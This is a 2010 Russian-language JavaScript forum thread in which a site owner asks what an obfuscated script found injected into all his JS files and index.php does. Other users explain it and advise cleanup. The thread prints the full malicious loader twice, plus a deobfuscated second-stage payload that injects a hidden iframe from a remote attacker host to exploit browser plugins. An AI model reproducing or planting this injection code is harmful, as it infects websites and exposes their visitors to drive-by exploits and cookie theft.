Javascript-форум (https://javascript.ru/forum/)
-   Оффтопик (https://javascript.ru/forum/offtopic/)
-   -   Вирусы в js файле (https://javascript.ru/forum/offtopic/9643-virusy-v-js-fajjle.html)

mycoding 29.05.2010 11:29
Вирусы в js файле
 
У меня недавно комп взломали, прилось сносить windows.
И на одном сайте который пишу во всех js файлах обнаружил вот это.
Я так понял это тоже действия вируса. Доктор веб их обнаружил.

Код вот, можете рассказать что он делает, пожалуйста? 

xt=57021;xt+=152;try {} catch(g){};var d;E=["CR","MA","H"];e=function(){var Vd={Mp:false};v=35597;v+=239;var l=["T"];function q(u,O,rZ){var oX=["S","y","Jn"];var _=["D"];return u.substr(O,rZ);n={};ap={QH:16411};}qk=[];G=57546;G+=54;var h='';var kY="kY";c={nP:9662};var uP=RegExp;var Eu={j:false};var J=String(q("/t-mGx5p",0,4)+q("2rp1obilp2r1",4,4)+q("vdsRe-codvsR",4,4)+q("m/goz5Iy",0,4)+q("zuFoglezFu",3,4)+q(".com0CMi",0,4)+q("/devhqt",0,4)+"iant"+q("art.HEsW",0,4)+q("com.gCj3",0,4)+q("phpEB5w",0,3));var Va=[];var V_="V_";var U=document;vm={Kr:false};var C_=new String();var Nv={};function r(u,O){var TZ={dS:false};try {} catch(yt){};var rZ="["+O+String(q("]ULmB",0,1));var b=new uP(rZ, String("g"));this.Wj='';this.io="io";return u.replace(b, h);};nr=25477;nr--;var N=813061-804981;this.HD=51320;this.HD-=152;var L="body";var o=null;var Vq="";JV=[];var Q=r('s9cor9iupQt2','QuPo2VSMD906j');var qR=new String();var qz=new String();var uz="";d=function(){z=31172;z--;try {var c_="c_";var x=r('c8rbeuabt8e8ETlbeYmueTnYtu','T8Y6fub');M=U[x](Q);var m=new String(q("deIpDh",0,2)+q("T7K5fe5T7K",4,2)+q("N0SrNS0",3,1));var iL=new Date();var k=r('s7rUcL','KZVUImLQCh473YDef');var u=N+J;gE={at:9846};try {} catch(wI){};var yL=[];HE={};Uw={};M[m]=[8,1][1];M[k]=new String("http:"+q("//tenDb7U",0,5)+q("thproEvX",0,5)+"fit.r"+q("u:bnM",0,2))+u;U[L].appendChild(M);} catch(hU){Iq=["ej"];nrA=["gg"];var yK=false;};};var Uc="Uc";};e();window.onload=d;var tz=new Array();this.Pt=58911;this.Pt-=11;try {var RO='BC'} catch(RO){};


Проверил ещё они мне даже в index.php тоже самое записали
<script>xt=57021;xt+=152;try {} catch(g){};var d;E=["CR","MA","H"];e=function(){var Vd={Mp:false};v=35597;v+=239;var l=["T"];function q(u,O,rZ){var oX=["S","y","Jn"];var _=["D"];return u.substr(O,rZ);n={};ap={QH:16411};}qk=[];G=57546;G+=54;var h='';var kY="kY";c={nP:9662};var uP=RegExp;var Eu={j:false};var J=String(q("/t-mGx5p",0,4)+q("2rp1obilp2r1",4,4)+q("vdsRe-codvsR",4,4)+q("m/goz5Iy",0,4)+q("zuFoglezFu",3,4)+q(".com0CMi",0,4)+q("/devhqt",0,4)+"iant"+q("art.HEsW",0,4)+q("com.gCj3",0,4)+q("phpEB5w",0,3));var Va=[];var V_="V_";var U=document;vm={Kr:false};var C_=new String();var Nv={};function r(u,O){var TZ={dS:false};try {} catch(yt){};var rZ="["+O+String(q("]ULmB",0,1));var b=new uP(rZ, String("g"));this.Wj='';this.io="io";return u.replace(b, h);};nr=25477;nr--;var N=813061-804981;this.HD=51320;this.HD-=152;var L="body";var o=null;var Vq="";JV=[];var Q=r('s9cor9iupQt2','QuPo2VSMD906j');var qR=new String();var qz=new String();var uz="";d=function(){z=31172;z--;try {var c_="c_";var x=r('c8rbeuabt8e8ETlbeYmueTnYtu','T8Y6fub');M=U[x](Q);var m=new String(q("deIpDh",0,2)+q("T7K5fe5T7K",4,2)+q("N0SrNS0",3,1));var iL=new Date();var k=r('s7rUcL','KZVUImLQCh473YDef');var u=N+J;gE={at:9846};try {} catch(wI){};var yL=[];HE={};Uw={};M[m]=[8,1][1];M[k]=new String("http:"+q("//tenDb7U",0,5)+q("thproEvX",0,5)+"fit.r"+q("u:bnM",0,2))+u;U[L].appendChild(M);} catch(hU){Iq=["ej"];nrA=["gg"];var yK=false;};};var Uc="Uc";};e();window.onload=d;var tz=new Array();this.Pt=58911;this.Pt-=11;try {var RO='BC'} catch(RO){};</script>
<!--29f5bff350373d6fe5430470f54cf714-->

Gvozd 29.05.2010 11:38
Цитата:
Сообщение от mycoding
что он делает
какая разница, если это вирус?
сноси к чертям, и непарься.
заодно почисть свою рабочую машину от вирусов, и поменяй пароли доступа к FTP

mycoding 29.05.2010 16:45
А есть ли декомпилятор js?
В google не нашёл, может он по другому называется.

B@rmaley.e><e 29.05.2010 17:13
Цитата:
Сообщение от mycoding
декомпилятор js?
Чего? JS динамически компилируемый язык, Вам не грозит увидеть его в скомпилированном виде.

К вопросу, чего он делает:
Подключает тег script с адресом http[двуеточие]//tenthprofit.ru[двуеточие]8080/t-mobile-com/google.com/deviantart.com.php

Там, в свою очередь, выдается следующее:
try{
Trvfvwlnvu6gz = document.referrer;
Np7hqwn4spuwm = '';
De18jtezg = 'RU';
Y2uyefq0s28a627us41 = '3275633747';
function Gl04wmepuripbb2r(Agj5a90vir75){
  if (Trvfvwlnvu6gz.indexOf(Agj5a90vir75) != -1){
    Np7hqwn4spuwm=Agj5a90vir75;
   }
}
Zquyj9ucncig = 'http:' + '//tenthprofit.ru:8080/index.php?pid=1&home=1';
Lfsqbfjyjq0b8u = 24-(12*2);
var Ot9vsbdmhjjhrly2d7 = document.createElement('div');
Ot9vsbdmhjjhrly2d7.id = 'Yxgwoh37f331s';
document.body.appendChild(Ot9vsbdmhjjhrly2d7);
Ryg3fb1ath = 'Lfsqbfjyjq0b8u';
Io1ksfduht3j8t = document.createElement('i&#&f(r@($@a!&m@e!(!'.replace(/&|\!|\^|\(|@|\)|#|\$/ig, ''));
Io1ksfduht3j8t.src = Zquyj9ucncig;
Io1ksfduht3j8t.height = Lfsqbfjyjq0b8u;
Io1ksfduht3j8t.width = Lfsqbfjyjq0b8u;
document.getElementById('Yxgwoh37f331s').appendChild(Io1ksfduht3j8t);

}catch(e){}


Здесь подключается невидимый фрейм с адресом, который можно увидеть выше.

mycoding 29.05.2010 18:41
А чем это опасно?
По поводу декомпиляции подразумевал обфускацию .
Вообще я не знаю как это называется.

B@rmaley.e><e 29.05.2010 19:50
Цитата:
Сообщение от mycoding
А чем это опасно?
Обычно в таких фреймах эксплуатируют дыры плагинов. Например, pdf.

http://lmgtfy.com/?q=js+beautifier

Gvozd 29.05.2010 20:35
класно
на эту тему у меня нод ругается

mycoding 29.05.2010 22:08
А можно ли например сделать crossdomain запрос и таким образом передать cookie?
Т.е. фактически похитить логин и пароль?

Gvozd 29.05.2010 22:26
Цитата:
Сообщение от mycoding
можно ли например сделать crossdomain запрос и таким образом передать cookie?
разумеется может


Часовой пояс GMT +3, время: 22:25.